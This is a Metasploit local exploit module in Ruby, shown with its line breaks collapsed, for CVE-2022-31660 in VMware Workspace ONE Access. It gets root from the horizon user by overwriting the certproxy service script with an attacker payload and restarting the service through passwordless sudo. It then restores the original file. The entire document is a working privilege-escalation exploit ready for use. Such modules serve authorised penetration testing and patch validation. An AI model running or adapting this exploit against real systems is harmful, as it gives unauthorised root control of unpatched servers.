VMware Workspace ONE Access Privilege Escalation

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Post::File  include Msf::Post::Unix  TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'VMware Workspace ONE Access CVE-2022-31660',          'Description' => %q{            VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges            to those of the root user by modifying a file and then restarting the vmware-certproxy service which            invokes it. The service control is permitted via the sudo configuration without a password.          },          'License' => MSF_LICENSE,          'Author' => [            'Spencer McIntyre'          ],          'Platform' => [ 'linux', 'unix' ],          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],          'SessionTypes' => ['shell', 'meterpreter'],          'Targets' => [            [ 'Automatic', {} ],          ],          'DefaultOptions' => {            'PrependFork' => true,            'MeterpreterTryToFork' => true          },          'Privileged' => true,          'DefaultTarget' => 0,          'References' => [            [ 'CVE', '2022-31660' ],            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]          ],          'DisclosureDate' => '2022-08-02',          'Notes' => {            # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service            # is disabled by default though.            'Stability' => [CRASH_SERVICE_DOWN],            'Reliability' => [REPEATABLE_SESSION],            'SideEffects' => [ARTIFACTS_ON_DISK]          }        }      )    )  end  def certproxy_service    # this script's location depends on the version, so find it.    return @certproxy_service if @certproxy_service    @certproxy_service = [      '/usr/local/horizon/scripts/certproxyService.sh',      '/opt/vmware/certproxy/bin/certproxyService.sh'    ].find { |path| file?(path) }    vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service    @certproxy_service  end  def sudo(arguments)    cmd_exec("sudo --non-interactive #{arguments}")  end  def check    unless whoami == 'horizon'      return CheckCode::Safe('Not running as the horizon user.')    end    token = Rex::Text.rand_text_alpha(10)    unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)      return CheckCode::Safe('Cannot invoke the service control script with sudo.')    end    unless writable?(TARGET_FILE)      return CheckCode::Safe('Cannot write to the service file.')    end    CheckCode::Appears  end  def exploit    # backup the original permissions and contents    print_status('Backing up the original file...')    @backup = {      stat: stat(TARGET_FILE),      contents: read_file(TARGET_FILE)    }    if payload.arch.first == ARCH_CMD      payload_data = "#!/bin/bash\n#{payload.encoded}"    else      payload_data = generate_payload_exe    end    upload_and_chmodx(TARGET_FILE, payload_data)    print_status('Triggering the payload...')    sudo("--background #{certproxy_service} restart")  end  def cleanup    return unless @backup    print_status('Restoring file contents...')    file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it    write_file(TARGET_FILE, @backup[:contents])    print_status('Restoring file permissions...')    chmod(TARGET_FILE, @backup[:stat].mode & 0o777)  endend